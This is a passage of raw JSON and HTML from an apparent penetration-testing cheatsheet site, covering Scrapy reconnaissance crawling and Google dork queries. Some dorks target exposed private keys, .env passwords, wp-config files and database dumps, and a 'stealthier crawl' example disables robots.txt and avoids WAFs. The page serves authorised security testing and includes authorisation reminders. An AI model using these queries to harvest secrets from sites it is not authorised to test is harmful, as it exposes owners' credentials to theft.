\u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSame as \u003ccode\u003e-o\u003c/code\u003e but overwrites instead of appending\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;name\u0026gt;=\u0026lt;value\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePass an argument to the spider (e.g. \u003ccode\u003e-a domain=example.com\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;KEY\u0026gt;=\u0026lt;value\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOverride a setting at runtime\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L \u0026lt;level\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLog level (\u003ccode\u003eDEBUG\u003c/code\u003e, \u003ccode\u003eINFO\u003c/code\u003e, \u003ccode\u003eWARNING\u003c/code\u003e, \u003ccode\u003eERROR\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--logfile \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite logs to a file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--nolog\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable logging\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;format\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format when not inferred from extension\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Create a project\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy startproject recon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Generate a spider scoped to a domain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd recon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy genspider links example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Run the spider and export results\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -o results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Run a standalone spider with output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy runspider spider.py -o output.jsonl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass arguments into a 
spider\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -a domain\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eexample.com -a depth\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Override settings on the fly (respect robots.txt off, set delay)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -s ROBOTSTXT_OBEY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eFalse -s DOWNLOAD_DELAY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Limit log noise\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -L WARNING -o out.csv\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test CSS / XPath selectors interactively\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"inside-the-scrapy-shell\"\u003eInside the 
Scrapy Shell\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# After: scrapy shell \u0026#34;https://example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurl                          \u003cspan style=\"color:#75715e\"\u003e# Current URL\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003estatus                       \u003cspan style=\"color:#75715e\"\u003e# HTTP status code\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eheaders                      \u003cspan style=\"color:#75715e\"\u003e# Response headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# CSS selectors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;a::attr(href)\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall()        \u003cspan style=\"color:#75715e\"\u003e# All link 
hrefs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;title::text\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eget()             \u003cspan style=\"color:#75715e\"\u003e# Page title\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# XPath selectors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003expath(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;//a/@href\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall()          \u003cspan style=\"color:#75715e\"\u003e# All link hrefs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003expath(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;//img/@src\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall()         \u003cspan style=\"color:#75715e\"\u003e# All image sources\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Follow a link\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efetch(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;https://example.com/about\u0026#39;\u003c/span\u003e)\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Regex over the body (e.g. emails)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e re\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ere\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003efindall(\u003cspan style=\"color:#e6db74\"\u003er\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;[\\w.+-]+@[\\w-]+\\.[\\w.-]+\u0026#39;\u003c/span\u003e, response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003etext)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"minimal-recon-spider\"\u003eMinimal Recon Spider\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# save as spider.py, run with: scrapy runspider spider.py -o out.json\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003efrom\u003c/span\u003e urllib.parse \u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e urlparse\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#66d9ef\"\u003eclass\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eReconSpider\u003c/span\u003e(scrapy\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eSpider):\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    name \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;recon\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    start_urls \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e [\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://example.com\u0026#34;\u003c/span\u003e]\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    \u003cspan style=\"color:#66d9ef\"\u003edef\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eparse\u003c/span\u003e(self, response):\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        \u003cspan style=\"color:#75715e\"\u003e# Collect all links and follow same-domain ones\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e href \u003cspan style=\"color:#f92672\"\u003ein\u003c/span\u003e response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;a::attr(href)\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall():\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e            \u003cspan style=\"color:#66d9ef\"\u003eyield\u003c/span\u003e {\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;link\u0026#34;\u003c/span\u003e: response\u003cspan 
style=\"color:#f92672\"\u003e.\u003c/span\u003eurljoin(href)}\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e            \u003cspan style=\"color:#66d9ef\"\u003eif\u003c/span\u003e urlparse(response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurljoin(href))\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003enetloc \u003cspan style=\"color:#f92672\"\u003e==\u003c/span\u003e urlparse(response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurl)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003enetloc:\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e                \u003cspan style=\"color:#66d9ef\"\u003eyield\u003c/span\u003e response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003efollow(href, callback\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eself\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eparse)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-settings-settingspy---s-overrides\"\u003eUseful Settings (settings.py / -s overrides)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSetting\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eROBOTSTXT_OBEY\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWhether to honour robots.txt (default \u003ccode\u003eTrue\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eDOWNLOAD_DELAY\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSeconds between requests (politeness / rate 
limiting)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eCONCURRENT_REQUESTS\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax simultaneous requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eDEPTH_LIMIT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax crawl depth (0 = unlimited)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eUSER_AGENT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eRETRY_TIMES\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of retries on failed requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eHTTPCACHE_ENABLED\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCache responses locally to avoid re-fetching\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAUTOTHROTTLE_ENABLED\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAuto-adjust delay based on server load\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Example: stealthier crawl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl recon \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -s 
DOWNLOAD_DELAY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -s CONCURRENT_REQUESTS\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -s AUTOTHROTTLE_ENABLED\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eTrue \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -s USER_AGENT\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"notes\"\u003eNotes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eActive\u003c/strong\u003e — Scrapy makes real HTTP requests to the target; only crawl in-scope assets.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eROBOTSTXT_OBEY=False\u003c/code\u003e only when authorised; by default Scrapy respects robots.txt.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eDOWNLOAD_DELAY\u003c/code\u003e / \u003ccode\u003eAUTOTHROTTLE\u003c/code\u003e to avoid hammering targets and tripping WAFs.\u003c/li\u003e\n\u003cli\u003eGreat base for custom recon crawlers — [[reconspider]] is a Scrapy-based spider built exactly for this.\u003c/li\u003e\n\u003cli\u003eExport to JSON/JSONL then post-process with \u003ccode\u003ejq\u003c/code\u003e to extract emails, subdomains, and links.\u003c/li\u003e\n\u003c/ul\u003e","title":"Scrapy"},{"content":"Search Operators (Google Dorking) Cheatsheet Type: 
Passive reconnaissance using advanced search-engine operators to surface exposed files, directories, credentials, subdomains, and metadata without touching the target\nCore Operators Operator Description Example site: Restrict results to a domain site:example.com inurl: Term appears in the URL inurl:admin intitle: Term appears in the page title intitle:\u0026quot;index of\u0026quot; intext: Term appears in the body text intext:password filetype: / ext: Restrict to a file extension filetype:pdf cache: Show Google\u0026rsquo;s cached copy cache:example.com related: Find similar sites related:example.com link: Pages linking to a URL (deprecated/limited) link:example.com define: Dictionary definition define:reconnaissance AROUND(n) Terms within n words of each other admin AROUND(3) password Operator Modifiers Modifier Description Example \u0026quot;...\u0026quot; Exact phrase match \u0026quot;confidential\u0026quot; - Exclude a term site:example.com -www OR / | Logical OR site:example.com (filetype:pdf OR filetype:docx) AND Logical AND (implicit) intitle:login AND inurl:admin * Wildcard / placeholder \u0026quot;username * password\u0026quot; ( ) Group terms site:example.com (admin OR login) .. 
Number range \u0026quot;budget 2020..2024\u0026quot; \u0026ldquo;all\u0026rdquo; Variants Operator Description allintitle: All following words must be in the title allinurl: All following words must be in the URL allintext: All following words must be in the body allinanchor: All following words must be in anchor text Note: all* operators don\u0026rsquo;t mix well with other operators — use the single-term versions (intitle:, inurl:) when combining.\nFinding Exposed Files \u0026amp; Directories # Open directory listings site:example.com intitle:\u0026#34;index of\u0026#34; intitle:\u0026#34;index of\u0026#34; \u0026#34;parent directory\u0026#34; # Backup and config files site:example.com ext:bak OR ext:old OR ext:backup site:example.com filetype:env site:example.com inurl:wp-config.php # Database dumps site:example.com ext:sql OR ext:db OR ext:dbf intext:\u0026#34;-- phpMyAdmin SQL Dump\u0026#34; # Log files site:example.com ext:log Finding Documents \u0026amp; Metadata # Office documents and PDFs (good for metadata harvesting) site:example.com filetype:pdf site:example.com (filetype:doc OR filetype:docx OR filetype:xls OR filetype:xlsx) # Configuration / credentials in text site:example.com ext:txt intext:password site:example.com filetype:xml inurl:config Finding Login Portals \u0026amp; Admin Panels site:example.com inurl:admin site:example.com (inurl:login OR inurl:signin OR intitle:login) site:example.com inurl:portal intitle:\u0026#34;Dashboard\u0026#34; inurl:admin Subdomain \u0026amp; Asset Discovery # Enumerate indexed subdomains (exclude main www) site:*.example.com -www # Find specific tech / paths site:example.com inurl:api site:example.com inurl:dev OR inurl:staging OR inurl:test Sensitive Information Exposure # Credentials and keys intext:\u0026#34;BEGIN RSA PRIVATE KEY\u0026#34; site:example.com intext:\u0026#34;password\u0026#34; filetype:log \u0026#34;index of\u0026#34; \u0026#34;id_rsa\u0026#34; # Exposed environment / secrets site:example.com 
ext:env \u0026#34;DB_PASSWORD\u0026#34; intitle:\u0026#34;index of\u0026#34; \u0026#34;.git\u0026#34; # Error messages leaking info site:example.com intext:\u0026#34;sql syntax near\u0026#34; OR intext:\u0026#34;Warning: mysql_\u0026#34; Other Search Engines Engine Notable Operators / Notes Bing Supports site:, filetype:, inbody:, intitle:, ip:\u0026lt;addr\u0026gt; (find sites on an IP) DuckDuckGo Supports site:, filetype:, intitle:, inurl:; !bang shortcuts Yandex Strong operator support; often indexes content others miss Shodan Device/banner search — hostname:, port:, org:, ssl: (not a web dork engine but pairs well) Resources # Google Hacking Database (GHDB) — huge curated dork collection https://www.exploit-db.com/google-hacking-database # DorkSearch / pre-built dork generators https://dorksearch.com Notes Passive — queries hit the search engine, not the target; nothing is sent to the victim\u0026rsquo;s infrastructure. Results reflect what\u0026rsquo;s been indexed — combine with crawling tools like [[scrapy]] / [[reconspider]] for live, unindexed content. Aggressive automated dorking can trigger Google CAPTCHAs / rate limits — throttle and rotate where needed. Always validate findings; cached or stale results may not reflect the current site state. Use only against assets you\u0026rsquo;re authorised to test — exposed data is still owned by the target. 
","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/search-engine/search-operators/","summary":"\u003ch1 id=\"search-operators-google-dorking-cheatsheet\"\u003eSearch Operators (Google Dorking) Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Passive reconnaissance using advanced search-engine operators to surface exposed files, directories, credentials, subdomains, and metadata without touching the target\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"core-operators\"\u003eCore Operators\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOperator\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eExample\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRestrict results to a domain\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003einurl:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the URL\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003einurl:admin\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the page title\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:\u0026quot;index of\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerm appears in the body 
text\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintext:password\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efiletype:\u003c/code\u003e / \u003ccode\u003eext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRestrict to a file extension\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efiletype:pdf\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecache:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShow Google\u0026rsquo;s cached copy\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecache:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003erelated:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFind similar 